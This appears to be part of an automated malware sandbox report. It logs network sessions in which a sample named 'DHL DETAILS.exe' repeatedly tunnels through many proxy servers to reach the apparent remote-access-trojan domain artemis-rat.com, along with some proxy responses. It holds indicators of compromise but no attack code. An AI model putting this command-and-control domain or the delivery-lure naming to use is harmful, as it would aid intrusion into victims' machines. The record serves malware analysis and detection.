                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1106192.168.2.552983178.54.21.20380816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.012168884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1107192.168.2.5533328.219.228.100156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.024224997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1108192.168.2.55300760.190.68.15473026352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.043205023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.390265942 CET90INHTTP/1.1 200 OK
                                                                                    Content-Type: application/json
                                                                                    Connection: close
                                                                                    Content-Length: 55


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1109192.168.2.553334202.162.219.1010806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.048080921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1110192.168.2.552952195.177.217.131580536352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.063997984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.224092960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1111192.168.2.553336202.83.102.8380806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.064001083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1112192.168.2.553341188.166.17.1888816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.068263054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1113192.168.2.553382104.16.221.57806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.076802969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.231184959 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:17 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1114192.168.2.553384172.67.25.204806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.080853939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.236093998 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:17 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1115192.168.2.55337638.54.101.25490006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.080945969 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:19.260034084 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1116192.168.2.553009120.79.101.088886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.085351944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.439843893 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1117192.168.2.552944138.36.150.1610806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.087950945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1118192.168.2.55143745.117.179.179147916352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.087954998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.224334002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1119192.168.2.553418104.18.251.208806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.151325941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.306771040 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:17 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1120192.168.2.553400192.163.202.88101856352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.153584957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.723901987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.333508015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.536958933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:22.036600113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:24.520966053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1121192.168.2.551493202.131.65.110806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.167362928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.224334002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:23.333271027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.333153963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.649945021 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1122192.168.2.552102142.54.236.9741456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.169637918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1123192.168.2.55334038.54.116.980806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.179511070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.588538885 CET39INHTTP/1.1 200 Connection established
                                                                                    Mar 9, 2024 13:14:21.676589012 CET39INHTTP/1.1 200 Connection established
                                                                                    Mar 9, 2024 13:14:24.330948114 CET39INHTTP/1.1 200 Connection established
                                                                                    Mar 9, 2024 13:14:29.453289986 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1124192.168.2.55334545.11.95.16552196352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.183382034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.617404938 CET39INHTTP/1.0 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1125192.168.2.553344212.108.155.20590906352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.194928885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1126192.168.2.551358103.130.218.135323386352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.200504065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.224419117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:23.333281994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.333147049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1127192.168.2.553430162.241.50.179498586352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.216192007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.825592041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.552479982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.780255079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1128192.168.2.551564148.72.23.56413836352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.216439009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.339302063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:23.380121946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.380481005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
